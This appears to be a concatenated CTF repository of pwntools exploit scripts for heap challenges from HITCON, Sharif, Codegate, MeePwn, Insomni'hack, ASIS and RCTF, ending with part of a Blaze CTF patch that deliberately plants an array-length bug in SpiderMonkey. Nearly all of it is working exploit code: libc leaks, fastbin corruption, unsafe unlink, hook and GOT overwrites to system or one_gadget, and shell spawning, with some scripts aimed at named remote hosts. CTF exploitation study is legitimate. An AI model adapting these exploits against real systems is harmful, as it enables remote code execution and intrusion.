6 | file = "./memo_heap" 7 | bin = ELF(file) 8 | 9 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 10 | 11 | conn = process(file) 12 | #gdb.attach(conn) 13 | 14 | def menu(ch): 15 | conn.recvuntil("Your choice: ") 16 | conn.sendline(str(ch)) 17 | 18 | def add(size, name = None): 19 | menu(1) 20 | conn.recvuntil("What is size of memo") 21 | conn.sendline(str(size)) 22 | conn.recvuntil("Name of memo: ") 23 | if size != 0: 24 | conn.send(name) 25 | conn.recvuntil("Done!") 26 | 27 | def edit(i, name = None, shell=False): 28 | menu(2) 29 | conn.recvuntil("Index of memo") 30 | conn.sendline(str(i)) 31 | if shell: 32 | return 33 | if name is not None: 34 | conn.recvuntil("New name") 35 | conn.send(name) 36 | conn.recvuntil("Done!") 37 | else: 38 | conn.recvuntil("Can not edit this memo") 39 | 40 | def show(i): 41 | menu(3) 42 | conn.recvuntil("Index of memo") 43 | conn.sendline(str(i)) 44 | conn.recvuntil("Name: ") 45 | 46 | def delete(i): 47 | menu(4) 48 | conn.recvuntil("Index of memo") 49 | conn.sendline(str(i)) 50 | conn.recvuntil("Done!") 51 | 52 | # Leaking libc 53 | add(0x80, "a") 54 | add(0x80, "b") 55 | delete(0) 56 | add(0x80, "a"*8) 57 | show(0) 58 | 59 | conn.recvn(8) 60 | 61 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 62 | libc.address = libc_leak - 0x7f7a36f98b78 + 0x7f7a36bd4000 63 | 64 | # Cleaning 65 | delete(0) 66 | delete(1) 67 | 68 | # Double free 69 | add(0) 70 | add(0) 71 | edit(0) 72 | delete(1) 73 | delete(0) 74 | 75 | add(0x10, p64(0)) # 0 76 | add(0x10, "a") # 1 77 | add(0x10, "b") # 2 78 | edit(0, "\xf0") 79 | 80 | # House of spirit 81 | payload = p64(0) + p64(0x70) 82 | payload = payload.ljust(0x70, "\x00") 83 | payload += p64(0) + p64(0x70) 84 | add(0x200, payload) # 3 85 | 86 | delete(2) 87 | 88 | # Fastbin corruption 89 | payload = p64(0) + p64(0x70) + p64(libc.symbols['__realloc_hook'] - 0x1b) 90 | edit(3, payload) 91 | 92 | add(0x60, "/bin/sh\x00") # 2 93 | add(0x60, "\x00"*(0x1b - 0x10) + p64(libc.symbols['system'])) 94 | 95 | edit(2, shell=True) 96 | 97 | log.info("Libc leak: " + hex(libc_leak)) 98 | 99 | conn.interactive() 100 | -------------------------------------------------------------------------------- /hitcon-2016/baby-heap-300/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.clear(arch = 'amd64') 4 | 5 | file = "./babyheap" 6 | 7 | bin = ELF(file) 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | 10 | 11 | conn = process(file) 12 | 13 | def new(size, content, name): 14 | conn.sendline("1") 15 | conn.recvuntil("Size :") 16 | conn.sendline(str(size)) 17 | conn.recvuntil("Content:") 18 | conn.send(content) 19 | conn.recvuntil("Name:") 20 | conn.send(name) 21 | conn.recvuntil("choice:") 22 | 23 | def exit(str): 24 | conn.sendline("4") 25 | conn.recvuntil("Y/n)") 26 | conn.send(str) 27 | conn.recvuntil("choice:") 28 | 29 | def delete(): 30 | conn.sendline("2") 31 | conn.recvuntil("choice:") 32 | 33 | def edit(content): 34 | conn.sendline("3") 35 | conn.recvuntil("Content:") 36 | conn.send(content) 37 | conn.recvuntil("choice:") 38 | 39 | payload = "n"*(0x1000 - 0x20) 40 | 41 | fake_chunk = p64(0) \ 42 | + p64(0x50) \ 43 | + "d"*16 44 | 45 | payload += fake_chunk 46 | 47 | exit(payload) 48 | 49 | fake_chunk = p64(0) \ 50 | + p64(0x21) 51 | 52 | new(0x80, fake_chunk, "a"*8) 53 | 54 | delete() 55 | 56 | fake_chunk = "q"*16 \ 57 | + p64(0) \ 58 | + p64(0x33) \ 59 | + p64(0x1000) \ 60 | + p64(0xcafecafe) \ 61 | + p64(bin.got['_exit']) # Gonna overwrite from this 62 | 63 | new(0x43, fake_chunk, "blah") 64 | 65 | # Gadgets 66 | ret_addr = 0x0000000000400711 67 | 68 | payload = p64(ret_addr) \ 69 | + p64(bin.symbols['__read_chk'] + 6) \ 70 | + p64(bin.symbols['puts'] + 6) \ 71 | + p64(ret_addr) \ 72 | + p64(bin.symbols['printf'] + 6) \ 73 | + p64(ret_addr) \ 74 | + p64(bin.symbols['read'] + 6) \ 75 | + p64(ret_addr) \ 76 | + p64(ret_addr) \ 77 | + p64(ret_addr) \ 78 | + p64(ret_addr) \ 79 | + p64(bin.symbols['printf']) 80 | 81 | edit(payload) 82 | 83 | fmtstr = "%9$s----" + p64(bin.got['free']) 84 | 85 | conn.send(fmtstr) 86 | 87 | free_addr = u64(conn.recvn(6) + "\x00\x00") 88 | 89 | system_addr = libc.symbols['system'] - libc.symbols['free'] + free_addr 90 | 91 | payload = payload[:len(payload)-8] 92 | payload += p64(system_addr) 93 | 94 | conn.recvuntil("choice:") 95 | conn.send("aaa") # atoi will get 3 96 | conn.recvuntil("Content:") 97 | conn.send(payload) 98 | 99 | conn.sendline("/bin/sh") 100 | 101 | conn.interactive() 102 | -------------------------------------------------------------------------------- /sharif-2018/t00p_secrets/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./t00p_secrets" 7 | 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | bin = ELF(file) 10 | 11 | conn = process(file) 12 | #gdb.attach(conn) 13 | 14 | def master_key(): 15 | conn.recvuntil("Enter your master") 16 | conn.sendline(p64(4283034714650536567) + \ 17 | p64(8243946171696569202) + \ 18 | p64(7454134929210039143)) 19 | 20 | def menu(choice): 21 | conn.recvuntil("6. Exit\n") 22 | conn.sendline(str(choice)) 23 | 24 | def c(idx, size, bin_str, body): 25 | menu(1) 26 | conn.recvuntil("secret idx: ") 27 | conn.sendline(str(idx)) 28 | conn.recvuntil("Enter secret body size: ") 29 | conn.sendline(str(size)) 30 | conn.recvuntil("binary(0)") 31 | conn.sendline(str(bin_str)) 32 | conn.recvuntil("secret body") 33 | conn.send(body) 34 | 35 | def d(idx): 36 | menu(2) 37 | conn.recvuntil("secret id") 38 | conn.sendline(str(idx)) 39 | 40 | def e(idx, bin_str, body): 41 | menu(3) 42 | conn.recvuntil("secret id") 43 | conn.sendline(str(idx)) 44 | conn.recvuntil("binary(0)") 45 | conn.sendline(str(bin_str)) 46 | conn.recvuntil("secret content") 47 | conn.send(body) 48 | 49 | def p(idx): 50 | menu(5) 51 | conn.recvuntil("secret id") 52 | conn.sendline(str(idx)) 53 | conn.recvuntil("content: ") 54 | 55 | master_key() 56 | 57 | secrets_addr = 0x6020B8 58 | 59 | # Leaking libc address 60 | c(0, 0x100, 0, "aa") 61 | c(1, 0x100, 0, "bb") 62 | d(0) 63 | c(0, 0x100, 0, "a"*8) 64 | p(0) 65 | conn.recvn(8) 66 | libc_leak = u64(conn.recvn(8)) 67 | libc.address = libc_leak - 0x7f562462cb78 + 0x7f5624268000 68 | d(0) 69 | d(1) 70 | 71 | # Cleaned up heap 72 | # Unsafe unlink 73 | 74 | c(0, 0xf8, 0, "aa") 75 | c(3, 0xf8, 0, "aa") 76 | c(4, 0xf8, 0, "aa") 77 | # Overwriting 4's prev_in_use_bit 78 | # Fake chunk 79 | payload = p64(0) + \ 80 | p64(0xf1) + \ 81 | p64(secrets_addr) + \ 82 | p64(secrets_addr + 8) 83 | payload = payload.ljust(0xf0, "\x00") 84 | payload += p64(0xf0) 85 | e(3, 1, payload) 86 | d(4) # Unlink 87 | 88 | # Now, secrets[3] points to secrets[0] 89 | 90 | def a_write(addr, data): 91 | e(3, 0, p64(addr)) 92 | e(0, 0, data) 93 | 94 | def a_read(addr): 95 | e(3, 0, p64(addr)) 96 | p(0) 97 | 98 | a_write(libc.symbols['__free_hook'], p64(libc.symbols['system'])) 99 | e(3, 1, "/bin/sh") 100 | d(3) 101 | 102 | log.info("Libc leak: " + hex(libc_leak)) 103 | 104 | conn.interactive() 105 | -------------------------------------------------------------------------------- /codegate-final-2015/heapster/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | #context.log_level = 'debug' 5 | 6 | libc_file = "libc-2.19.so" 7 | file = "./heapster" 8 | 9 | libc = ELF(libc_file) 10 | bin = ELF(file) 11 | 12 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), libc_file)} 13 | 14 | conn = process(file, env=env) 15 | gdb.attach(conn) 16 | 17 | def malloc(size): 18 | conn.recvuntil("cmd>> ") 19 | conn.sendline("0") 20 | conn.recvuntil("size>> ") 21 | conn.sendline(str(size)) 22 | conn.recvuntil("= ") 23 | return conn.recvline().strip() 24 | 25 | def realloc(addr, size, shell=True): 26 | conn.recvuntil("cmd>> ") 27 | conn.sendline("1") 28 | conn.recvuntil("addr>> ") 29 | conn.sendline(addr) 30 | conn.recvuntil("size>> ") 31 | conn.sendline(str(size)) 32 | if shell: 33 | return 34 | conn.recvuntil("= ") 35 | return conn.recvline().strip() 36 | 37 | def free(addr): 38 | conn.recvuntil("cmd>> ") 39 | conn.sendline("2") 40 | conn.recvuntil("addr>> ") 41 | conn.sendline(addr) 42 | 43 | def fill(addr, data): 44 | conn.recvuntil("cmd>> ") 45 | conn.sendline("3") 46 | conn.recvuntil("addr>> ") 47 | conn.sendline(addr) 48 | conn.recvuntil("data>> ") 49 | str = "" 50 | for ch in data: 51 | str += ch.encode('hex') + " " 52 | str = str.strip() 53 | conn.sendline(str) 54 | 55 | def dump(addr): 56 | conn.recvuntil("cmd>> ") 57 | conn.sendline("4") 58 | conn.recvuntil("addr>> ") 59 | conn.sendline(addr) 60 | data = conn.recvline().strip() 61 | data = data.replace(' ', '').decode('hex') 62 | return data 63 | 64 | # Libc leaking 65 | 66 | a = malloc(0x80) 67 | b = malloc(0x80) 68 | free(a) 69 | a = malloc(0x80) 70 | libc_leak = u64(dump(a)[0:6] + "\x00\x00") 71 | 72 | log.info(hex(libc_leak)) 73 | 74 | libc_base = libc_leak - 0x7ff44132a7b8 + 0x7ff440f69000 75 | #libc_base = libc_leak - 0x7f6281f67b78 + 0x7f6281ba3000 76 | # 0x7f73ac3497b8 77 | 78 | # Clearing 79 | free(a) 80 | free(b) 81 | 82 | # Fastbin dup - use after free 83 | 84 | a = malloc(0x80) 85 | b = malloc(0x80) 86 | c = malloc(0x60) 87 | free(c) 88 | realloc(a, 0x80) # Now can use c 89 | 90 | realloc_hook_chunk = libc_base + libc.symbols['__realloc_hook'] - 0x10 - 3 91 | fill(c, p64(realloc_hook_chunk).ljust(0x60, "\x00")) 92 | 93 | d = malloc(0x60) 94 | e = malloc(0x60) 95 | 96 | payload = "\x00"*3 + p64(libc_base + libc.symbols['system']) 97 | fill(e, payload.ljust(0x60, "\x00")) 98 | log.info(hex(libc_base)) 99 | fill(d, "/bin/sh".ljust(0x60, "\x00")) 100 | 101 | realloc(d, 0x60, shell=True) 102 | 103 | log.info("Libc leak: " + hex(libc_leak)) 104 | 105 | conn.interactive() 106 | -------------------------------------------------------------------------------- /meepwn-2018/house_of_card/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./house_of_card" 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc.so") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so")} 12 | 13 | #conn = gdb.debug(file, env=env) 14 | conn = remote("178.128.87.12", 31336) 15 | 16 | def menu(ch): 17 | conn.recvuntil("Quit\n") 18 | conn.sendline(str(ch)) 19 | 20 | """ 21 | read(name, 63 char) 22 | read(len) 23 | malloc(len) and read desc in it 24 | malloc(len + 69) and set structure 25 | free(desc) 26 | malloc(0x18) for node 27 | insert at end of list 28 | """ 29 | def new(name, l, desc): 30 | menu(1) 31 | conn.recvuntil("Name") 32 | conn.send(name) 33 | conn.recvuntil("Len") 34 | conn.sendline(str(l)) 35 | conn.recvuntil("Description") 36 | conn.send(desc) 37 | 38 | """ 39 | read(idx) 40 | read(name, 64 char) 41 | read(len) 42 | if len <= original_len: 43 | read(desc, len char) 44 | else 45 | realloc(original_note, len + 68) 46 | read(desc, len + 68 char) -- overflow 47 | """ 48 | def edit(idx, name, l, desc, menu_call=True): 49 | if menu_call: 50 | menu(2) 51 | conn.recvuntil("Back.") 52 | conn.sendline(str(idx)) 53 | conn.recvuntil("New name") 54 | conn.send(name) 55 | conn.recvuntil("Len?") 56 | conn.sendline(str(l)) 57 | conn.send(desc) 58 | 59 | """ 60 | read(idx) 61 | free(note) 62 | free(node) 63 | """ 64 | def delete(idx): 65 | menu(3) 66 | conn.recvuntil("Back.") 67 | conn.sendline(str(idx)) 68 | conn.recvuntil("Done") 69 | 70 | # Libc leak 71 | new("vampire\n", 0x100, "desc1\n") 72 | new("vampire2\n", 0x100, "desc2\n") 73 | new("vampire3\n", 0x100, "desc3\n") 74 | menu(2) 75 | conn.recvuntil("desc3\x00\x00\x00") 76 | libc_leak = u64(conn.recvn(8)) 77 | #libc.address = libc_leak - 0x7f0ba43d4c78 + 0x7f0ba4010000 78 | libc.address = libc_leak - 0x7efd6c656c58 + 0x7efd6c295000 79 | 80 | edit(1, "vampire\n", 0x100, "desc1\n", menu_call=False) 81 | 82 | log.info("Libc base : " + hex(libc.address)) 83 | 84 | # Clearing up heap 85 | delete(1) 86 | delete(1) 87 | delete(1) 88 | new("vampire\n", 0x400, "desc1\n") 89 | delete(1) # consolidate 90 | 91 | # Only the first chunk in fastbin, can be ignored since it'll 92 | # pop out the next malloc 93 | 94 | # Overwriting node_ptr 95 | new("vampire\n", 0x100, "desc1\n") 96 | # Clear up the unsorted bin 97 | for i in range(8): 98 | new("vampire%d\n" % i, 0x110, "desc2\n") 99 | new("vampire10\n", 0x100, "desc10\n") 100 | #delete(10) 101 | payload = "d"*(0xd0 + 60) + p64(libc.symbols['__realloc_hook']) + "\n" 102 | edit(1, "vampire\n", 0x101, payload) 103 | one_gadget = libc.address + 0xce0e1 104 | edit(10, p64(one_gadget) + "\n", 0x100, "ls -l\n") 105 | conn.interactive() 106 | -------------------------------------------------------------------------------- /insomni-hack-finals-18/yanc/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./yanc" 7 | bin = ELF(file) 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | 10 | conn = process(file) 11 | #gdb.attach(conn) 12 | 13 | def menu(ch): 14 | conn.recvuntil("quit") 15 | conn.sendline(str(ch)) 16 | 17 | def add(note, title, shell=False): 18 | menu(1) 19 | conn.recvuntil("Enter note : ") 20 | conn.send(note) 21 | if shell: 22 | return 23 | conn.recvuntil("Enter title : ") 24 | conn.send(title) 25 | 26 | def delete(idx): 27 | menu(2) 28 | conn.recvuntil("Which one :") 29 | conn.sendline(str(idx)) 30 | 31 | def view(): 32 | menu(3) 33 | 34 | # Libc leak: 35 | add("note2\n", "title2\n") 36 | add("note3\n", "title3\n") 37 | add("note1" + "a"*0x90 + "\n", "title1\n") 38 | add("note4\n", "title4\n") 39 | delete(2) 40 | delete(0) 41 | add("note2\n", "a"*0x20 + "\x50") 42 | view() 43 | conn.recvuntil("Note : ") 44 | conn.recvuntil("Note : ") 45 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 46 | 47 | libc.address = libc_leak - 0x7fbe3ce99b78 + 0x7fbe3cad5000 48 | 49 | # Clearing 50 | delete(0) 51 | add("note2\n", "a"*0x20 + "\x30") 52 | delete(0) 53 | delete(1) 54 | delete(3) 55 | add("a"*0xb0 + "\n", "title\n") 56 | delete(0) 57 | 58 | # pwning 59 | add("note1" + "a"*0x60 + "\n", "title1\n") 60 | add("note2" + "a"*0x60 + "\n", "title2\n") 61 | add("note3" + "a"*0x60 + "\n", "title3\n") 62 | delete(0) 63 | add("note1" + "a"*0x60 + "\n", "a"*0x20 + "\x10") 64 | delete(0) 65 | delete(2) 66 | delete(1) 67 | 68 | payload = p64(libc.symbols['__malloc_hook'] - 0x23) 69 | payload = payload.ljust(0x60, "\x00") + "\n" 70 | add(payload, "title1\n") 71 | add("a"*0x60 + "\n", "title2\n") 72 | add("a"*0x60 + "\n", "title2\n") 73 | 74 | """ 75 | 0x4526a execve("/bin/sh", rsp+0x30, environ) 76 | constraints: 77 | [rsp+0x30] == NULL 78 | 79 | 0xcd0f3 execve("/bin/sh", rcx, r12) 80 | constraints: 81 | [rcx] == NULL || rcx == NULL 82 | [r12] == NULL || r12 == NULL 83 | 84 | 0xcd1c8 execve("/bin/sh", rax, r12) 85 | constraints: 86 | [rax] == NULL || rax == NULL 87 | [r12] == NULL || r12 == NULL 88 | 89 | 0xf02a4 execve("/bin/sh", rsp+0x50, environ) 90 | constraints: 91 | [rsp+0x50] == NULL 92 | 93 | 0xf1147 execve("/bin/sh", rsp+0x70, environ) 94 | constraints: 95 | [rsp+0x70] == NULL 96 | 97 | 0xf66f0 execve("/bin/sh", rcx, [rbp-0xf8]) 98 | constraints: 99 | [rcx] == NULL || rcx == NULL 100 | [[rbp-0xf8]] == NULL || [rbp-0xf8] == NULL 101 | """ 102 | 103 | one_gadget_addr = libc.address + 0xf02a4 104 | payload = "\x00"*0x13 + p64(one_gadget_addr) 105 | payload = payload.ljust(0x60, "\x00") + "\n" 106 | add(payload, "title3\n") 107 | add("a\n", "whoami\n", shell=True) 108 | 109 | log.info("Libc leak: " + hex(libc_leak)) 110 | 111 | conn.interactive() 112 | -------------------------------------------------------------------------------- /asis-finals-2018/mem0/exploit-16.04.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | context.log_level = 'debug' 5 | 6 | file = "./memo" 7 | bin = ELF("./memo") 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | conn = process(file) 10 | #gdb.attach(conn) 11 | 12 | indexes = [0]*10 13 | 14 | def menu(ch): 15 | conn.recvuntil("5. Exit") 16 | conn.sendline(str(ch)) 17 | 18 | def create(size, content): 19 | menu(1) 20 | conn.recvuntil("memo size: ") 21 | conn.sendline(str(size)) 22 | conn.recvuntil("content: ") 23 | conn.send(content) 24 | for i in range(10): 25 | if indexes[i] == 0: 26 | indexes[i] = 1 27 | return i 28 | assert(False) 29 | 30 | def edit(idx, content): 31 | menu(2) 32 | conn.recvuntil("idx: ") 33 | conn.sendline(str(idx)) 34 | conn.recvuntil("content: ") 35 | conn.send(content) 36 | 37 | def delete(idx): 38 | menu(3) 39 | conn.recvuntil("idx: ") 40 | conn.sendline(str(idx)) 41 | indexes[idx] = 0 42 | 43 | def show(idx): 44 | menu(4) 45 | conn.recvuntil("idx: ") 46 | conn.sendline(str(idx)) 47 | conn.recvuntil("content: ") 48 | 49 | # Overlapping chunks 50 | id1 = create(0x100, "a\n") 51 | id2 = create(0x98, "b\n") 52 | id3 = create(0xf0, "c\n") 53 | id4 = create(0xf0, "d\n") 54 | 55 | delete(id1) 56 | edit(id2, "\x00"*0x90 + p64(0x110 + 0xa0)) 57 | delete(id3) 58 | 59 | # A big chunk is freed, id2 is part of that 60 | 61 | # Leaking libc 62 | id5 = create(0x100, "a\n") 63 | show(id2) 64 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 65 | libc.address = libc_leak - 0x7f5fcfd0fb78 + 0x7f5fcf94b000 66 | delete(id5) 67 | 68 | # Cleanup 69 | delete(id4) 70 | 71 | # Fastbin corruption 72 | id1 = create(0x100, "a\n") 73 | id2 = create(0x68, "b\n") 74 | id3 = create(0xf0, "c\n") 75 | id4 = create(0xf0, "d\n") 76 | delete(id1) 77 | edit(id2, "\x00"*0x60 + p64(0x110 + 0x70)) 78 | delete(id3) 79 | delete(id2) 80 | payload = "\x00"*0x100 + \ 81 | p64(0) + p64(0x71) + \ 82 | p64(libc.symbols['__malloc_hook'] - 0x23) + \ 83 | "\x00"*0x58 + \ 84 | p64(0) + p64(0x71) 85 | id5 = create(0x270, payload + "\n") 86 | id6 = create(0x60, "a\n") 87 | 88 | """ 89 | 0x45216 execve("/bin/sh", rsp+0x30, environ) 90 | constraints: 91 | rax == NULL 92 | 93 | 0x4526a execve("/bin/sh", rsp+0x30, environ) 94 | constraints: 95 | [rsp+0x30] == NULL 96 | 97 | 0xf02a4 execve("/bin/sh", rsp+0x50, environ) 98 | constraints: 99 | [rsp+0x50] == NULL 100 | 101 | 0xf1147 execve("/bin/sh", rsp+0x70, environ) 102 | constraints: 103 | [rsp+0x70] == NULL 104 | """ 105 | payload = "\x00"*0x13 + p64(libc.address + 0xf02a4) 106 | id7 = create(0x60, payload + "\n") 107 | 108 | # rip control 109 | delete(id5) 110 | # leads to error condition which calls strdup and hence malloc! 111 | delete(id6) 112 | 113 | log.info("Libc leak: " + hex(libc_leak)) 114 | 115 | conn.interactive() 116 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | 5 | file = "./sapeloshop" 6 | 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("libc-2.23.so") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.23.so.")} 12 | 13 | conn = remote("sapeloshop.teaser.insomnihack.ch", 80) 14 | #conn = process(file, env=env) 15 | #gdb.attach(conn) 16 | 17 | def html(url, content): 18 | r = "" 19 | if content is None: 20 | r += "GET" 21 | else: 22 | r += "POST" 23 | r += " /" + url + " HTTP/1.1\r\n" 24 | r += "Connection: keep-alive\r\n" 25 | if content is not None: 26 | r += "Content-Length: " + str(len(content)) + "\r\n" 27 | r += "\r\n" 28 | if content is not None: 29 | r += content 30 | return r 31 | 32 | def parse(num): 33 | """Returns the item contents depending on num items""" 34 | conn.recvuntil("Content-Length") 35 | conn.recvuntil("\r\n\r\n") 36 | items = [] 37 | for i in range(num): 38 | conn.recvuntil("class=\"row\">
> ") 20 | conn.sendline(choice) 21 | 22 | def create_marimo(name, profile): 23 | conn.recvuntil("name? (0x10)") 24 | conn.sendline(name) 25 | conn.recvuntil("'s profile.") 26 | conn.sendline(profile) 27 | conn.recvuntil(">> ") 28 | 29 | def create(name, profile): 30 | menu("show me the marimo") 31 | create_marimo(name, profile) 32 | 33 | def buy(name, profile, size): 34 | menu("B") 35 | conn.recvuntil("want for Marimo? (cm)") 36 | conn.sendline(str(size)) 37 | conn.recvuntil("Give me money") 38 | conn.sendline("P") 39 | create_marimo(name, profile) 40 | 41 | def sell(idx): 42 | menu("S") 43 | conn.recvuntil("sell? (number)") 44 | conn.sendline(str(idx)) 45 | conn.recvuntil("un away ?") 46 | conn.sendline("S") 47 | conn.recvuntil("good bye marimo T-T") 48 | 49 | def view(idx): 50 | menu("V") 51 | conn.recvuntil("Select number or [B]ack") 52 | conn.sendline(str(idx)) 53 | 54 | def back(): 55 | conn.recvuntil("[M]odify /") 56 | conn.sendline("B") 57 | 58 | def modify(profile): 59 | conn.recvuntil("[M]odify /") 60 | conn.sendline("M") 61 | conn.recvuntil("new profile") 62 | conn.sendline(profile) 63 | 64 | create("name1", "profile1") 65 | create("name2", "profile2") 66 | 67 | sleep(2) 68 | 69 | def a_read(addr): 70 | view(0) 71 | payload = "a"*8*4 + \ 72 | p64(0) + \ 73 | p64(0x21) + \ 74 | p32(0xffff) + p32(0xaaaa) + \ 75 | p64(0) + \ 76 | p64(addr) 77 | modify(payload) 78 | back() 79 | view(1) 80 | conn.recvuntil("profile : ") 81 | 82 | def a_write(addr, data): 83 | view(0) 84 | payload = "a"*8*4 + \ 85 | p64(0) + \ 86 | p64(0x21) + \ 87 | p32(0xffff) + p32(0xaaaa) + \ 88 | p64(0) + \ 89 | p64(addr) 90 | modify(payload) 91 | back() 92 | view(1) 93 | modify(data) 94 | back() 95 | 96 | a_read(bin.got['puts']) 97 | puts_addr = u64(conn.recvn(6) + "\x00\x00") 98 | back() 99 | 100 | system_addr = libc.symbols['system'] - libc.symbols['puts'] + puts_addr 101 | bin_sh_addr = next(libc.search("/bin/sh")) - libc.symbols['puts'] + puts_addr 102 | 103 | rip = 0xdeadbeef 104 | a_write(bin.got['strcmp'], p64(system_addr)[:-1]) 105 | 106 | conn.sendline("/bin/sh") 107 | #create("name3", "profile2") 108 | 109 | log.info("System addr: " + hex(system_addr)) 110 | 111 | conn.interactive() 112 | -------------------------------------------------------------------------------- /rctf-2018/babyheap/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./babyheap" 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc.so.6") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 12 | 13 | #conn = process(file, env=env) 14 | conn = remote("babyheap.2018.teamrois.cn", 3154) 15 | #gdb.attach(conn) 16 | 17 | def menu(ch): 18 | conn.recvuntil("choice:") 19 | conn.sendline(str(ch)) 20 | 21 | def alloc(size, content, shell=False): 22 | menu(1) 23 | conn.recvuntil("size") 24 | conn.sendline(str(size)) 25 | if shell: 26 | return 27 | conn.recvuntil("content") 28 | conn.send(content) 29 | 30 | def show(idx): 31 | menu(2) 32 | conn.recvuntil("index") 33 | conn.sendline(str(idx)) 34 | 35 | def delete(idx): 36 | menu(3) 37 | conn.recvuntil("index") 38 | conn.sendline(str(idx)) 39 | 40 | # Poison null byte - Leak libc 41 | alloc(0x58, "a\n") # 0 42 | payload = "\x00"*0xf0 + p64(0x100) 43 | alloc(0x100, payload + "\n") # 1 44 | alloc(0x90, "a\n") # 2 45 | alloc(0x100, "a\n") # 3 46 | delete(1) 47 | delete(0) 48 | alloc(0x58, "a"*0x58) # 0 49 | alloc(0x40, "a\n") # 1 50 | alloc(0x90, "b\n") # 4 51 | delete(1) 52 | delete(3) 53 | delete(2) 54 | 55 | # Sacred chunk in 4 56 | alloc(0x40, "a\n") # 1 57 | alloc(0xb0, "a\n") # 2 = 4 actually 58 | alloc(0xb0, "a\n") # 3 59 | delete(2) 60 | show(4) 61 | conn.recvuntil("content: ") 62 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 63 | #libc.address = libc_leak - 0x7f214103cb78 + 0x7f2140c78000 64 | libc.address = libc_leak - 0x7f37bcd2ab78 + 0x7f37bc966000 65 | log.info("Libc leak: " + hex(libc_leak)) 66 | delete(1) 67 | delete(3) 68 | 69 | # Same situation, fastbin corruption 70 | alloc(0x40, "a\n") # 1 71 | alloc(0x60, "a\n") # 2 - 4 72 | alloc(0x60, "a\n") # 3 73 | delete(2) 74 | delete(3) 75 | delete(4) 76 | 77 | alloc(0x60, p64(libc.symbols['__malloc_hook'] - 0x23) + "\n") # 2 78 | alloc(0x60, "a\n") # 3 79 | alloc(0x60, "a\n") # 4 80 | 81 | """ 82 | 0x4526a execve("/bin/sh", rsp+0x30, environ) 83 | constraints: 84 | [rsp+0x30] == NULL 85 | 86 | 0xcd0f3 execve("/bin/sh", rcx, r12) 87 | constraints: 88 | [rcx] == NULL || rcx == NULL 89 | [r12] == NULL || r12 == NULL 90 | 91 | 0xcd1c8 execve("/bin/sh", rax, r12) 92 | constraints: 93 | [rax] == NULL || rax == NULL 94 | [r12] == NULL || r12 == NULL 95 | 96 | 0xf02a4 execve("/bin/sh", rsp+0x50, environ) 97 | constraints: 98 | [rsp+0x50] == NULL 99 | 100 | 0xf1147 execve("/bin/sh", rsp+0x70, environ) 101 | constraints: 102 | [rsp+0x70] == NULL 103 | 104 | 0xf66f0 execve("/bin/sh", rcx, [rbp-0xf8]) 105 | constraints: 106 | [rcx] == NULL || rcx == NULL 107 | [[rbp-0xf8]] == NULL || [rbp-0xf8] == NULL 108 | """ 109 | 110 | alloc(0x60, "\x00"*0x13 + p64(libc.address + 0x4526a) + "\n") 111 | 112 | alloc(10, "a", shell=True) 113 | 114 | conn.interactive() 115 | -------------------------------------------------------------------------------- /blaze-ctf-2018/blazefox/blaze.patch: -------------------------------------------------------------------------------- 1 | diff -r ee6283795f41 js/src/builtin/Array.cpp 2 | --- a/js/src/builtin/Array.cpp Sat Apr 07 00:55:15 2018 +0300 3 | +++ b/js/src/builtin/Array.cpp Sun Apr 08 00:01:23 2018 +0000 4 | @@ -192,6 +192,20 @@ 5 | return ToLength(cx, value, lengthp); 6 | } 7 | 8 | +static MOZ_ALWAYS_INLINE bool 9 | +BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length) 10 | +{ 11 | + if (obj->is()) { 12 | + obj->as().setLengthInt32(length); 13 | + obj->as().setCapacityInt32(length); 14 | + obj->as().setInitializedLengthInt32(length); 15 | + return true; 16 | + } 17 | + return false; 18 | +} 19 | + 20 | + 21 | + 22 | /* 23 | * Determine if the id represents an array index. 24 | * 25 | @@ -1578,6 +1592,23 @@ 26 | return DenseElementResult::Success; 27 | } 28 | 29 | +bool js::array_blaze(JSContext* cx, unsigned argc, Value* vp) 30 | +{ 31 | + CallArgs args = CallArgsFromVp(argc, vp); 32 | + RootedObject obj(cx, ToObject(cx, args.thisv())); 33 | + if (!obj) 34 | + return false; 35 | + 36 | + if (!BlazeSetLengthProperty(cx, obj, 420)) 37 | + return false; 38 | + 39 | + //uint64_t l = 